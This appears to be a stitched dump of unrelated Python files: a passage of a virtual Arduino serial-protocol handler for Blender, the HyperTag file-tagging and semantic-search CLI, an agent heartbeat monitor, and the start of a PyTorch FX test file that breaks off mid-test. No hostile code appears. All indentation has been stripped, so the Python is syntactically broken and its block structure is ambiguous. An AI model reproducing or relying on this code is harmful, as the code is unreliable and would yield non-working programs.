# {setSampleRate int}
SET_SAMPLE_RATE = 37
# {setSerialRate int}
SET_SERIAL_RATE = 38
# {setServoEventsEnabled String boolean}
SET_SERVO_EVENTS_ENABLED = 39
# {setServoSpeed String Float}
SET_SERVO_SPEED = 40
# {setStepperSpeed Integer}
SET_STEPPER_SPEED = 41
# {setTrigger int int int}
SET_TRIGGER = 42
# {softReset}
SOFT_RESET = 43
# {stepperAttach String}
STEPPER_ATTACH = 44
# {stepperDetach String}
STEPPER_DETACH = 45
# {stepperMoveTo String int int}
STEPPER_MOVE_TO = 46
# {stepperReset String}
STEPPER_RESET = 47
# {stepperStop String}
STEPPER_STOP = 48
# {stopService}
STOP_SERVICE = 49
##### PYTHON GENERATED INTERFACE END #####
def __init__(self, name):
print("creating new Arduino ", name)
self.name = name
self.servos = {}
self.msgByteCount = 0
self.msgSize = 0
self.method = 0
self.params = []
def sendMRLCOMMMsg(self, method, value):
socket = bpy.mrl.virtualDevices[self.name].serialHandler.request
print("sending bytes")
print(bytes([170, 2, method, value]))
# MRLCOMM PROTOCOL
# MAGIC_NUMBER|NUM_BYTES|FUNCTION|DATA0|DATA1|....|DATA(N)
# NUM_BYTES - is the number of bytes after NUM_BYTES to the end
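# e.g. publishing MRLCOMM_VERSION (21) as a PUBLISH_VERSION (3) reply goes out as
# bytes([170, 2, 3, 21]) -> magic, 2 payload bytes, function id, data byte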
socket.sendall(bytes([170, 2, method, value]))
def handle(self, byteArray):
newByteCnt = len(byteArray)
# print (self.name + " recvd " + str(newByteCnt) + " bytes")
# print(byteArray)
# parse MRL Msg
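# Worked example: the byte stream [170, 3, 31, 0, 90] decodes to magic=170, size=3,
# method=31 (SERVO_WRITE) and params=[0, 90], i.e. move servo index 0 (assuming it
# was attached earlier via SERVO_ATTACH) to 90 degrees.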
for newByte in byteArray:
self.msgByteCount += 1
# print("byte ", newByte, " byteCount ", self.msgByteCount, " size ", self.msgSize)
# check magic
if (self.msgByteCount == 1):
if (newByte != 170):
print("ERROR message does not begin with MAGIC")
self.msgByteCount = 0
self.msgSize = 0
elif (self.msgByteCount == 2):
# print command - TODO error checking > 64
self.msgSize = newByte
# print("MRLCOMM msg size is " + str(self.msgSize))
elif (self.msgByteCount == 3):
# print("MRLCOMM method is " + str(newByte))
self.method = newByte
elif (self.msgByteCount > 3 and self.msgByteCount - 3 < self.msgSize):
# print("MRLCOMM datablock")
self.params.append(newByte)
elif (self.msgByteCount > 3 and self.msgByteCount - 3 > self.msgSize):
print("MRLCOMM ERROR STATE - resetting ")
self.msgSize = 0
self.msgByteCount = 0
self.params = []
# now we have a full valid message
if (self.msgByteCount - 2 == self.msgSize and self.msgSize != 0):
print("Arduino Msg Method # -> ", self.method)
# GET_VERSION
if (self.method == self.GET_VERSION):
print("GET_MRLCOMM_VERSION")
self.sendMRLCOMMMsg(self.PUBLISH_VERSION, self.MRLCOMM_VERSION)
elif (self.method == self.SERVO_ATTACH):
print("SERVO_ATTACH", self.params)
# create "new" servo if doesnt exist
# attach to this Arduino's set of servos
params = self.params
servoIndex = params[0]
servoPin = params[1]
servoName = ""
for x in range(3, params[2]+3):
servoName += chr(params[x])
print ("servo index", servoIndex, "pin", servoPin, "name", servoName)
self.servos[servoIndex] = servoName
bpy.mrl.blenderObjects[servoName] = 0 # rest position? 90 ?
elif (self.method == self.SERVO_WRITE):
print("SERVO_WRITE", self.params)
servoIndex = self.params[0]
pos = self.params[1]
servoName = self.servos[servoIndex]
if (bge.logic.getCurrentController() is not None):
ob = bge.logic.getCurrentController().owner
if (servoName in ob.channels):
ob.channels[servoName].joint_rotation = mathutils.Vector([radians(pos),0,0])
ob.update()
print("WROTE ", servoName, pos, radians(pos))
else:
print("ERROR can't find bone ", servoName)
else:
print("ERROR logic controller == None - game engine not running?")
elif (self.method == self.SERVO_DETACH):
print("SERVO_DETACH", self.params)
elif (self.method == self.SET_SERVO_SPEED):
print("SET_SERVO_SPEED", self.params)
elif (self.method == self.SERVO_WRITE_MICROSECONDS):
print("SERVO_WRITE_MICROSECONDS", self.params)
else:
print ("ERROR UNKNOWN METHOD ", self.method, self.params)
#print("MRLCOMM msg done ")
self.msgSize = 0
self.msgByteCount = 0
self.params = []
# do command
def client(ip, port, message):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ip, port))
try:
sock.sendall(message)
response = sock.recv(1024).decode()
print ("Received: {}".format(response))
finally:
sock.close()
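# Example use (illustrative): send one raw control command and print the reply, e.g.
#   client("localhost", controlPort, b'{"method": "getVersion", "data": []}\n')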
def endcomm():
print("endcomm")
bge.logic.endGame()
startServer()
frame = 0
def frameTick():
global frame
frame = frame + 1
|
hypertag.py
|
import os
import re
from typing import Set
from shutil import rmtree, move
import sqlite3
import urllib
import json
from multiprocessing import Pool
from pathlib import Path
import fire # type: ignore
from tqdm import tqdm # type: ignore
import rpyc # type: ignore
from pywebcopy import WebPage, config # type: ignore
from persistor import Persistor
from graph import graph
from utils import remove_dir, remove_symlink, download_url
from __init__ import __version__
class HyperTag:
""" HyperTag CLI """
def __init__(self):
self.db = Persistor()
self.root_dir = Path(self.db.get_hypertagfs_dir())
os.makedirs(self.root_dir, exist_ok=True)
def search_image(
self, *text_queries: str, cpu=None, top_k=10, path=0, score=0, verbose=0, _return=0
):
""" Execute a semantic search that returns best matching images """
text_query = " ".join(text_queries)
try:
rpc = rpyc.connect("localhost", 18861)
results = rpc.root.search_image(text_query, path, top_k, score)
for result in results:
print(result)
if len(results) == 0:
print("No relevant files indexed...")
except ConnectionRefusedError:
from vectorizer import CLIPVectorizer
vectorizer = CLIPVectorizer(cpu, verbose)
results = vectorizer.search_image(text_query, path, top_k, score)
if _return:
return results
def index(self, text=None, image=None, rebuild=False, cache=False, cores: int = 0):
""" Vectorize image & text files (needed for semantic search) """
if (image and text is None) or (image and text) or (not image and not text):
self.index_images(rebuild)
if (text and image is None) or (image and text) or (not image and not text):
self.index_texts(rebuild, cache, cores)
def index_images(self, rebuild=False):
""" Vectorize image files (needed for semantic search) """
from vectorizer import CLIPVectorizer, get_image_files
if rebuild:
print("Rebuilding images index")
file_paths = self.db.get_vectorized_file_paths()
else:
file_paths = self.db.get_unvectorized_file_paths()
compatible_files = get_image_files(file_paths, verbose=True)
print("Vectorizing", len(compatible_files), "images...")
remote = True
if remote:
try:
rpc = rpyc.connect("localhost", 18861)
rpc._config["sync_request_timeout"] = None # Disable timeout
print("Connected to DaemonService successfully")
except ConnectionRefusedError:
print("DaemonService connection failed, falling back to local execution...")
remote = False
if not remote:
img_vectorizer = CLIPVectorizer(verbose=1)
for file_path in tqdm(compatible_files):
if remote:
img_vector = json.loads(rpc.root.encode_image(file_path))[0]
else:
img_vector = img_vectorizer.encode_image(file_path)[0].tolist()
self.db.add_file_embedding_vector(file_path, json.dumps(img_vector))
self.db.conn.commit()
print("Updating index...")
if remote:
rpc.root.update_image_index()
else:
img_vectorizer.update_index()
def index_texts(self, rebuild=False, cache=False, cores: int = 0):
""" Vectorize text files (needed for semantic search) """
# TODO: index images
# TODO: auto index on file addition (import)
from vectorizer import TextVectorizer, extract_clean_text, get_text_documents
print("Vectorizing text documents...")
remote = True
if remote:
try:
rpc = rpyc.connect("localhost", 18861)
rpc._config["sync_request_timeout"] = None # Disable timeout
print("Connected to DaemonService successfully")
except ConnectionRefusedError:
print("DaemonService connection failed, falling back to local execution...")
remote = False
if cache:
print("Caching cleaned texts (database will grow big)")
if rebuild:
print("Rebuilding texts index")
file_paths = self.db.get_vectorized_file_paths()
else:
file_paths = self.db.get_unvectorized_file_paths()
i = 0
compatible_files = get_text_documents(file_paths, verbose=True)
min_words = 5
min_word_length = 4
args = []
for file_path, file_type in compatible_files:
args.append((file_path, file_type, cache, min_words, min_word_length))
inference_tuples = []
# Preprocess using multi-processing (default uses all available cores)
if cores <= 0:
n_cores = os.cpu_count()
else:
n_cores = cores
pool = Pool(processes=n_cores)
print(f"Preprocessing texts using {n_cores} cores...")
with tqdm(total=len(compatible_files)) as t:
for file_path, sentences in pool.imap_unordered(extract_clean_text, args):
t.update(1)
if sentences:
inference_tuples.append((file_path, sentences))
print(f"Cleaned {len(inference_tuples)} text doc/s successfully")
print("Starting inference...")
# Compute embeddings
if not remote:
vectorizer = TextVectorizer(verbose=True)
for file_path, sentences in tqdm(inference_tuples):
if remote:
document_vector = json.loads(rpc.root.compute_text_embedding(json.dumps(sentences)))
else:
document_vector = vectorizer.compute_text_embedding(sentences)
if (
document_vector is not None
and type(document_vector) is list
and len(document_vector) > 0
):
self.db.add_file_embedding_vector(file_path, json.dumps(document_vector))
self.db.add_text(file_path, ". ".join([" ".join(s) for s in sentences]))
self.db.conn.commit()
i += 1
else:
print(type(document_vector))
self.db.add_file_embedding_vector(file_path, json.dumps([]))
self.db.conn.commit()
print("Failed to parse file - skipping:", file_path)
print(f"Vectorized {str(i)} file/s successfully")
print("Updating index...")
if remote:
rpc.root.update_text_index()
else:
vectorizer.update_index()
def search(self, text_queries: str, path=False, top_k=10, score=False, _return=False):
""" Combination of token_search and semantic_search """
text_query = text_queries
token_matches = self.token_search(text_query, path, top_k, score, _return=True)
token_matches = [tm.split("/")[-1] for tm in token_matches]
results = token_matches[:5]
token_matches = token_matches[5:]
token_matches_set = set(token_matches)
semantic_matches = self.semantic_search(text_queries, path, top_k * 4, score, _return=True)
semantic_matches_set = set(semantic_matches)
intersections = token_matches_set.intersection(semantic_matches_set)
for i in token_matches:
if i in intersections:
results.append(i)
for e in token_matches:
if e not in intersections:
results.append(e)
results += semantic_matches
if _return:
return results[:top_k]
else:
for result in results[:top_k]:
print(result)
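# The combined search above is typically driven from the CLI (assuming the `hypertag`
# console entry point registered in main() below), e.g.:
#   $ hypertag search "neural network notes" --top_k=5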
def token_search(self, text_queries: str, path=False, top_k=10, score=False, _return=False):
""" Execute an exact token matching search that returns best matching text documents """
# text_query = " ".join(text_queries)
text_query = text_queries
# print("ST", text_query)
results = self.db.search_text(text_query, top_k=top_k)
if _return:
return results
else:
for result in results:
print(result)
def semantic_search(self, text_queries: str, path=False, top_k=10, score=False, _return=False):
""" Execute a semantic search that returns best matching text documents """
# text_query = " . ".join(text_queries)
text_query = text_queries
# print("SS", text_query)
try:
rpc = rpyc.connect("localhost", 18861)
results = rpc.root.search(text_query, path, top_k, score)
if not _return:
for result in results:
print(result)
if len(results) == 0:
print("No relevant files indexed...")
except (ConnectionRefusedError, RuntimeError):
from vectorizer import TextVectorizer
vectorizer = TextVectorizer()
results = vectorizer.search(text_query, path, top_k, score, not _return)
if _return:
return results
def add_auto_import_dir(self, path: str, index_images=False, index_texts=False):
""" Add path for auto import directory (watched by daemon) """
self.db.add_auto_import_directory(path, index_images, index_texts)
def set_hypertagfs_dir(self, path: str):
""" Set path for HyperTagFS directory """
self.db.set_hypertagfs_dir(path)
def mount(self, root_dir=None, parent_tag_id=None):
""" Generate HyperTagFS: tag representation using symlinks """
if root_dir is None:
root_dir = self.root_dir
root_path = Path(root_dir)
if parent_tag_id is None:
print("Updating HyperTagFS...")
graph()
os.makedirs(root_path / "Search Texts", exist_ok=True)
os.makedirs(root_path / "Search Images", exist_ok=True)
tag_ids_names = self.db.get_root_tag_ids_names()
parent_file_paths_names = None
else:
tag_ids_names = self.db.get_tag_id_children_ids_names(parent_tag_id)
parent_file_paths_names = set(
self.db.get_file_paths_names_by_tag_id_shallow(parent_tag_id)
)
leaf_tag_ids = {tag_id[0] for tag_id in self.db.get_leaf_tag_ids()}
dupes = dict()
for tag_id, name in tag_ids_names:
child_file_paths_names = set(self.db.get_file_paths_names_by_tag_id_shallow(tag_id))
if parent_file_paths_names is None:
file_paths_names = child_file_paths_names
else: # Intersect parent files with child
file_paths_names = parent_file_paths_names.intersection(child_file_paths_names)
if len(file_paths_names) > 0:
underscore_root_tag_path = root_path / ("_" + name)
root_tag_path = root_path / name
if not root_tag_path.exists():
os.makedirs(underscore_root_tag_path, exist_ok=True)
move(underscore_root_tag_path, root_tag_path) # Needed for daemon
symlink_path = root_tag_path
if tag_id not in leaf_tag_ids:
symlink_path = root_tag_path / "_files"
os.makedirs(symlink_path, exist_ok=True)
for file_path, file_name in file_paths_names:
try:
filepath = Path(file_path)
current_symlink_path = symlink_path / file_name
if current_symlink_path.exists() and current_symlink_path.is_symlink():
existing_target = current_symlink_path.resolve() # Get symlink target
if str(existing_target) != str(filepath): # Duplicate?
dupe_i = dupes.get(current_symlink_path, 1) + 1
dupes[current_symlink_path] = dupe_i
current_symlink_path = symlink_path / (f"{dupe_i}-" + file_name)
os.symlink(filepath, current_symlink_path)
except FileExistsError:
pass
self.mount(root_tag_path, tag_id)
def auto_add_tags_from_path(
self, file_path: Path, import_path_dirs: Set[str], verbose=False, keep_all=False
):
file_path_tags = [p for p in str(file_path).split("/") if p not in import_path_dirs]
if not keep_all:
file_path_tags = file_path_tags[:-1]
if verbose:
print("Inferred tags:", file_path_tags)
self.tag(
file_path,
"with",
*file_path_tags,
remount=False,
add=False,
commit=False,
)
for previous, current in zip(file_path_tags, file_path_tags[1:]):
self.metatag(current, "with", previous, remount=False, commit=False)
# print(file_path_tags, file_path.name)
def import_tags(self, import_path: str, only_tags=False, verbose=False):
"""Import files with tags inferred from existing directory hierarchy
(ignores hidden directories)"""
file_paths = [p for p in list(Path(import_path).rglob("*")) if p.is_file()]
# Remove files in hidden directories or in ignore list
ignore_list = set(self.db.get_ignore_list())
visible_file_paths = []
for p in file_paths:
is_hidden = False
for pp in str(p).split("/"):
if pp.startswith(".") or pp in ignore_list:
is_hidden = True
if not is_hidden:
visible_file_paths.append(p)
print("Adding files...")
if only_tags:
added_file_paths = visible_file_paths
else:
added_file_paths = self.add(*visible_file_paths)
import_path_dirs = set(str(Path(import_path).resolve()).split("/")[:-1])
print("import_path_dirs", import_path_dirs)
print("Adding tags...")
for file_path in tqdm(added_file_paths):
self.auto_add_tags_from_path(os.path.abspath(str(file_path)), import_path_dirs, verbose)
self.db.conn.commit()
self.mount(self.root_dir)
def remove(self, *file_names):
""" Remove files """
for file_name in tqdm(file_names):
self.db.remove_file(file_name)
remove_symlink(self.root_dir, file_name)
self.mount(self.root_dir)
def scrape(self, url, folder, timeout=1):
config.setup_config(url, folder)
wp = WebPage()
wp.get(url)
# start the saving process
wp.save_complete()
# join the sub threads
for t in wp._threads:
if t.is_alive():
t.join(timeout)
# location of the html file written
return wp.file_path
def add_url(self, url):
webpages_regex = r"\S+\.html|\S+\.htm|\S+\.php|\S+\/[^.]+"
matches = re.findall(webpages_regex, url)
if matches and len(matches[0]) == len(url):
web_pages_path = self.db.db_path / "web_pages"
os.makedirs(web_pages_path, exist_ok=True)
index_path = self.scrape(url, str(web_pages_path))
return index_path
else:
downloads_path = self.db.db_path / "downloads"
os.makedirs(downloads_path, exist_ok=True)
file_name = url.split("/")[-1]
file_path = downloads_path / file_name
download_url(url, file_path)
return file_path
def add(self, *paths):
""" Add file/s or URL/s"""
added = []
for path in tqdm(paths):
try:
if str(path).startswith("http"):
file_path = self.add_url(path)
self.db.add_file(os.path.abspath(file_path))
added.append(path)
elif Path(path).is_file():
self.db.add_file(os.path.abspath(path))
added.append(path)
except sqlite3.IntegrityError:
pass
self.db.conn.commit()
print("Added", len(added), "new file/s")
return added
def tags(self, *file_names):
""" Display all tags of file/s """
tags = set()
for file_name in file_names:
tags.update(set(self.db.get_tags_by_file_name(file_name)))
for tag in tags:
print(tag)
def show(self, mode="tags", path=False):
""" Display all tags (default), indexed files (mode=index) or files """
if mode == "files":
names = self.db.get_files(path)
elif mode == "index":
names = self.db.get_vectorized_file_paths(path)
elif mode == "tags":
names = self.db.get_tags()
for name in names:
print(name)
def query(self, *query, path=False, fuzzy=True, verbose=False):
"""Query files using set operands.
Supported operands:
and (intersection (default))
or (union)
minus (difference)
"""
# TODO: Parse AST to support queries with brackets
operands = {"and", "or", "minus"}
tag_val = query[0].split("=")
if len(tag_val) == 1:
tag_query, value = (query[0], None)
else:
tag_query, value = (tag_val[0], tag_val[-1])
value = value.replace("*", "%")
results = set(self.db.get_files_by_tag(tag_query, path, fuzzy, value, verbose))
current_operand = None
for query_symbol in query[1:]:
if query_symbol not in operands:
tag_val = query_symbol.split("=")
if len(tag_val) == 1:
tag_query, value = (query_symbol, None)
else:
tag_query, value = (tag_val[0], tag_val[-1])
value = value.replace("*", "%")
file_names = set(self.db.get_files_by_tag(tag_query, path, fuzzy, value, verbose))
if current_operand == "or":
results = results.union(file_names)
elif current_operand == "minus":
results = results - file_names
else:
# and (intersection) is default operand
results = results.intersection(file_names)
else:
current_operand = query_symbol
return results
def tag(self, *args, remount=True, add=True, commit=True):
""" Tag file/s with tag/s """
# Parse arguments
file_paths = []
tags = []
is_file_path = True
for arg in args:
if arg == "with":
is_file_path = False
continue
if is_file_path:
file_paths.append(arg)
else:
tag_val = arg.split("=")
if len(tag_val) == 1:
tags.append((arg, None))
else:
tags.append((tag_val[0], tag_val[-1]))
if add:
self.add(*file_paths)
# Add tags to files
for file_path in file_paths:
for tag, value in tags:
self.db.add_tag_to_file(tag, str(file_path), value)
parent_tag_ids = self.db.get_parent_tag_ids_by_name(tag)
# Add parent tags to file
for parent_tag_id in parent_tag_ids:
self.db.add_tag_to_file(parent_tag_id, str(file_path))
if commit:
self.db.conn.commit()
# Remount (everything is mounted)
if remount:
self.mount(self.root_dir)
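# Example (illustrative file names): ht.tag("notes.md", "todo.txt", "with", "project", "year=2021")
# tags both files with `project` and with `year` carrying the value 2021.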
def untag(self, *args, remount=True, commit=True):
""" Untag (remove tag/s of) file/s with tag/s """
# Parse arguments
file_names = []
tags = []
is_file_name = True
for arg in args:
if arg == "with":
is_file_name = False
continue
if is_file_name:
file_names.append(arg)
else:
tags.append(arg)
# Remove tags
for file_name in file_names:
file_name = file_name.split("/")[-1]
for tag in tags:
self.db.remove_tag_from_file(tag, file_name)
# print("Tagged", file_name, "with", tags)
if commit:
self.db.conn.commit()
# TODO: Remove symlink (get all paths from metatags)
# Remount (everything is mounted)
if remount:
self.mount(self.root_dir)
def metatags(self, *tag_names):
""" Display all metatags (parents) of tag/s """
tags = set()
for tag_name in tag_names:
tags.update(set(self.db.get_meta_tags_by_tag_name(tag_name)))
for tag in tags:
print(tag)
def metatag(self, *args, remount=True, commit=True):
""" Tag tag/s with tag/s """
# Parse arguments
parent_tags = []
tags = []
is_parent_tag = False
for arg in args:
if arg == "with":
is_parent_tag = True
continue
if is_parent_tag:
parent_tags.append(arg)
else:
tags.append(arg)
# Add meta tags
for tag in tags:
for parent_tag in parent_tags:
self.db.add_parent_tag_to_tag(parent_tag, tag)
# print("MetaTagged", tag, "with", parent_tags)
# Add tags to files
file_paths = self.db.get_files_by_tag(tag, show_path=True, fuzzy=True)
for file_path in file_paths:
self.db.add_tag_to_file(tag, str(file_path))
parent_tag_ids = self.db.get_parent_tag_ids_by_name(tag)
# Add parent tags to file
for parent_tag_id in parent_tag_ids:
self.db.add_tag_to_file(parent_tag_id, str(file_path))
if commit:
self.db.conn.commit()
for tag in tags:
for parent_tag in parent_tags:
# Remove parent_tag dir in all levels
remove_dir(self.root_dir, parent_tag)
# Remove tag dir in root level
try:
rmtree(self.root_dir / tag)
except Exception: # nosec
pass # Ignore if non existing
# Remount (everything is mounted)
if remount:
self.mount(self.root_dir)
def merge(self, tag_a, _into, tag_b):
""" Merges all associations (files & tags) of tag_a into tag_b """
print("Merging tag", tag_a, "into", tag_b)
self.db.merge_tags(tag_a, tag_b)
remove_dir(self.root_dir, tag_a)
self.mount(self.root_dir)
def daemon(cpu=None, text=None, image=None):
""" Start daemon process """
print("Starting up daemon...")
from .daemon import start
from multiprocessing import Process, set_start_method
set_start_method("spawn")
p = Process(target=start, args=(cpu, text, image))
p.start()
p.join()
def help():
""" Get some help on how to use HyperTag """
print(
"""
README: https://github.com/SeanPedersen/HyperTag/blob/master/README.md
Found a bug or simply feeling lost?
Do not despair, you're not alone! Let us know at https://github.com/SeanPedersen/HyperTag/issues
Chat and read about HyperTag using Matrix at https://bit.ly/2Xtz2Ff
Print available CLI functions: hypertag
Print available CLI flags for all commands: hypertag command --help
"""
)
def main():
ht = HyperTag()
fire_cli = {
"help": help,
"version": __version__,
"add": ht.add,
"remove": ht.remove,
"import": ht.import_tags,
"tag": ht.tag,
"t": ht.tag,
"untag": ht.untag,
"metatag": ht.metatag,
"tt": ht.metatag,
"merge": ht.merge,
"show": ht.show,
"tags": ht.tags,
"metatags": ht.metatags,
"query": ht.query,
"q": ht.query,
"set_hypertagfs_dir": ht.set_hypertagfs_dir,
"add_auto_import_dir": ht.add_auto_import_dir,
"mount": ht.mount,
"daemon": daemon,
"graph": graph,
"index": ht.index,
"search_image": ht.search_image,
"si": ht.search_image,
"search": ht.search,
"s": ht.search,
"semantic_search": ht.semantic_search,
"ss": ht.semantic_search,
"search_token": ht.token_search,
"st": ht.token_search,
}
fire.Fire(fire_cli)
if __name__ == "__main__":
main()
|
agent_state_manager.py
|
#! /usr/bin/env python
# _*_ coding:utf-8 _*_
import threading
import time
# from server import STATE_UPDATE_INTERVAL, AgentState
from .agent_state import *
from common import event_manager, CommonEvent
def singleton(cls):
_instance = {}
def _singleton(*args, **kargs):
if cls not in _instance:
_instance[cls] = cls(*args, **kargs)
return _instance[cls]
return _singleton
@singleton
class AgentStateMonitor(object):
"""
Agent state monitor class; implemented as a singleton.
"""
def __init__(self):
self.lock = threading.Lock() # lock for thread-safe access to agent_state_dict
self.agent_state_dict = dict()
self.__running = threading.Event()
self.__state_monitor_thread = threading.Thread(target=self.__agents_state_monitor)
agent_event = CommonEvent()
event_manager.add_event_listener(agent_event.EVENT_HEARTBEAT, self.add_new_agent_state)
def add_new_agent_state(self, event):
state_data = event.dict
agent_state = AgentState()
agent_state.gen_from_json_obj(state_data)
# self.update_agent_state(agent_state)
self.lock.acquire()
self.agent_state_dict[agent_state.agent_identifier] = agent_state
self.lock.release()
def update_agent_state(self, agent_state):
self.agent_state_dict[agent_state.agent_identifier] = agent_state
agent_state.print_state()
def start_monitor(self):
self.__running.set()
self.__state_monitor_thread.daemon = True
self.__state_monitor_thread.start()
def stop_monitor(self):
self.__running.clear()
self.agent_state_dict.clear()
def __agents_state_monitor(self):
while self.__running.is_set():
if len(self.agent_state_dict) > 0:
self.lock.acquire()
for agent_state in list(self.agent_state_dict.values()):
# agent_state.print_state()
new_state = self.__check_state(agent_state)
if new_state == "Dead":
print("Agent {0} is dead.\nAgent {1} is removed.".format(
agent_state.agent_identifier,
agent_state.agent_identifier))
# self.agent_state_dict.pop(agent_state.agent_identifier)
else:
agent_state.state = new_state
agent_state.timestamp = time.time() # refresh the state timestamp
agent_state.print_state()
self.agent_state_dict[agent_state.agent_identifier] = agent_state
self.lock.release()
time.sleep(5)
def __check_state(self, agent_state):
"""
Determine the agent state by comparing the current time with the last heartbeat timestamp:
between 2x and 5x STATE_UPDATE_INTERVAL the agent is Offline, beyond 5x it is Dead, otherwise Online.
:param agent_state: the agent state object
:return: agent state: "Offline", "Dead" or "Online"
"""
last_time = time.time() - agent_state.timestamp
if STATE_UPDATE_INTERVAL * 2.0 < last_time <= STATE_UPDATE_INTERVAL * 5.0:
return "Offline"
elif last_time > STATE_UPDATE_INTERVAL * 5.0:
return "Dead"
else:
return "Online"
if __name__ == '__main__':
monitor = AgentStateMonitor()
print(id(monitor))
monitor1 = AgentStateMonitor()
print(id(monitor1))
|
test_fx.py
|
import builtins
import contextlib
import copy
import functools
import inspect
import math
import numbers
import operator
import os
import pickle
import sys
import torch
import traceback
import typing
import types
import warnings
import unittest
from math import sqrt
from torch.multiprocessing import Process
from torch.testing import FileCheck
from torch.testing._internal.common_methods_invocations import op_db
from torch.testing._internal.common_device_type import ops, onlyCPU, instantiate_device_type_tests
import torch.utils._pytree as pytree
import torch.fx._pytree as fx_pytree
from torch.fx import symbolic_trace, Proxy, Node, GraphModule, Interpreter, Tracer, Transformer, Graph, wrap, PH
import torch._C._fx
from torch.fx.node import Target, Argument
from torch.fx.passes import shape_prop
from torch.fx.immutable_collections import immutable_dict, immutable_list
from torch.fx.experimental.rewriter import RewritingTracer
from torch.fx.operator_schemas import get_signature_for_torch_op
from copy import deepcopy
from collections import namedtuple
from torch.fx.proxy import TraceError
from torch.fx._compatibility import _BACK_COMPAT_OBJECTS, _MARKED_WITH_COMATIBLITY
from fx.test_subgraph_rewriter import TestSubgraphRewriter # noqa: F401
from fx.test_dce_pass import TestDCE # noqa: F401
from fx.test_fx_const_fold import TestConstFold # noqa: F401
from fx.test_fx_param_shape_control_flow import TestConstParamShapeInControlFlow # noqa: F401
if sys.version_info >= (3, 7):
from fx.test_gradual_type import AnnotationsTest # noqa: F401
if sys.version_info >= (3, 7):
from fx.test_gradual_type import TypeCheckerTest # noqa: F401
from typing import Any, Callable, Dict, NamedTuple, List, Optional, Tuple, Union
from torch.testing._internal.common_utils import (
IS_FBCODE,
IS_MACOS,
IS_WINDOWS,
TEST_WITH_ROCM,
find_library_location,
run_tests,
)
from torch.testing._internal.jit_utils import JitTestCase
from fx.named_tup import MyNamedTup
try:
from torchvision import models as torchvision_models
HAS_TORCHVISION = True
except ImportError:
HAS_TORCHVISION = False
skipIfNoTorchVision = unittest.skipIf(not HAS_TORCHVISION, "no torchvision")
class SimpleTest(torch.nn.Module):
def forward(self, x):
return torch.relu(x + 3.0)
def a_non_torch_leaf(a, b):
return a + b
# Used for test_autowrap_function. Autowrapped functions need to be global
def fx_int(x: float) -> int:
return int(x)
def fx_int_x2(x: float) -> int:
return int(x) * 2
# used in test_pytree. It's all the way out here because pickling a GraphModule
# that uses Point errors out if Point is local to the function
Point = namedtuple('Point', ['x', 'y'])
# Test wrap() passing both a function name as well as a function
# directly
def a_lifted_leaf(a, b):
return a[0] + a[1] + b
wrap('a_lifted_leaf')
# Test wrapping twice doesn't break anything
wrap('a_lifted_leaf')
def a_lifted_leaf2(a, b):
return a[0] + a[1] + b
wrap(a_lifted_leaf2)
wrap('len')
wrap('getattr')
@wrap
def wrapped_via_decorator(a):
return a + 1
wrap('wrapped_with_submodule')
def wrapped_with_submodule(x: torch.Tensor, batchnorm1d: torch.nn.BatchNorm1d):
return batchnorm1d(x)
real_wrapped_via_decorator = wrapped_via_decorator
real_a_lifed_leaf = a_lifted_leaf
real_a_lifed_leaf2 = a_lifted_leaf2
_sqrt = sqrt
wrap('wrapper_fn')
def wrapper_fn(x):
return torch.foo(x)
class Pair(NamedTuple):
x : torch.Tensor
y : torch.Tensor
# for testing pytrees
class Foo(object): # noqa: B209
def __init__(self, a, b):
self.a = a
self.b = b
class TestFX(JitTestCase):
def setUp(self):
# Checking for mutable operations while tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
if not (TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS):
lib_file_path = find_library_location('libtorchbind_test.so')
torch.ops.load_library(str(lib_file_path))
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
def checkGraphModule(self, m: torch.nn.Module, args, kwargs=None):
"""Check that an nn.Module's results match the GraphModule version
for a given set of args/kwargs.
"""
kwargs = kwargs if kwargs else {}
ref_outs = m(*args, **kwargs)
gm = symbolic_trace(m)
gm.graph.lint()
test_outs = gm(*args, **kwargs)
self.assertEqual(ref_outs, test_outs)
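# For instance, from inside a test method this helper can be exercised with the
# SimpleTest module defined near the top of this file:
#   self.checkGraphModule(SimpleTest(), (torch.rand(3, 4),))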
def test_graph_module(self):
class MySub(torch.nn.Module):
def __init__(self):
super().__init__()
self.w = torch.nn.Parameter(torch.rand(4, 3))
def forward(self, x):
return self.w + x
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.lin = torch.nn.Linear(4, 3)
self.sub_mod = MySub()
self.w = torch.nn.Parameter(torch.rand(3))
def forward(self, A, B, c):
t = torch.sigmoid(A) + self.lin(c)
return self.sub_mod(t.data + self.w + t + 1 - A + B // A + -A + A.add(B, alpha=3))
m = MyModule()
gm = symbolic_trace(m)
ms = torch.jit.script(gm)
class M2(torch.nn.Module):
def forward(self, A):
m, idx = torch.max(A, 0)
return m + 1, idx + 1
m2 = M2()
gm2 = symbolic_trace(m2)
class T(torch.nn.Module):
def forward(self, A, b=4, *args, c=5, **kwargs):
x = A + 1 + args[0] + kwargs['3']
return x
t = T()
symbolic_trace(t)
# test for issue described at https://github.com/pytorch/pytorch/issues/63883
class M3(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
m3 = M3()
gm3 = symbolic_trace(m3)
new_instance = gm3.__new__(type(gm3))
new_instance.__init__(gm3, gm3.graph)
x = torch.randn(5, 3)
torch.testing.assert_allclose(new_instance(x), torch.relu(x))
def test_custom_import(self):
graph = torch.fx.Graph()
a = graph.placeholder('x')
b = graph.placeholder('y')
c = graph.call_function(a_non_torch_leaf, (a, b))
d = graph.call_function(torch.sin, (c,))
graph.output(d)
gm = GraphModule(torch.nn.Module(), graph)
x, y = torch.rand(1), torch.rand(1)
self.assertEqual(torch.sin(x + y), gm(x, y))
def test_args_kwargs(self):
class T(torch.nn.Module):
def forward(self, *args, **kwargs):
x = args[0] + kwargs['foo']
return x
t = T()
self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)})
def test_args_kwargs_no_self(self):
class T(torch.nn.Module):
def forward(*args, **kwargs): # noqa: B902
self = args[0]
return torch.relu(args[1])
t = T()
with self.assertRaisesRegex(RuntimeError, r'cannot be part of \*args expansion'):
self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)})
def test_fx_shifts(self):
class MyModule(torch.nn.Module):
def forward(self, x):
return x << 3, x >> 3
